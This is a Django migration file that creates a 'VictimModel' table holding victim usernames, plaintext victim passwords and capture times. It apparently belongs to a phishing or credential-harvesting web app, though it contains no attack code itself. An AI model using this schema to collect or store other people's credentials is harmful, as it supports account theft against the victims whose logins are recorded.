# Generated by Django 4.0.6 on 2022-12-01 17:41

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('webapp', '0002_appusermodel_isactive'),
    ]

    operations = [
        migrations.CreateModel(
            name='VictimModel',
            fields=[
                ('victim_id', models.PositiveIntegerField(primary_key=True, serialize=False, unique=True)),
                ('victim_username', models.CharField(max_length=30)),
                ('victim_password', models.CharField(max_length=30)),
                ('record_time', models.DateTimeField()),
            ],
        ),
    ]
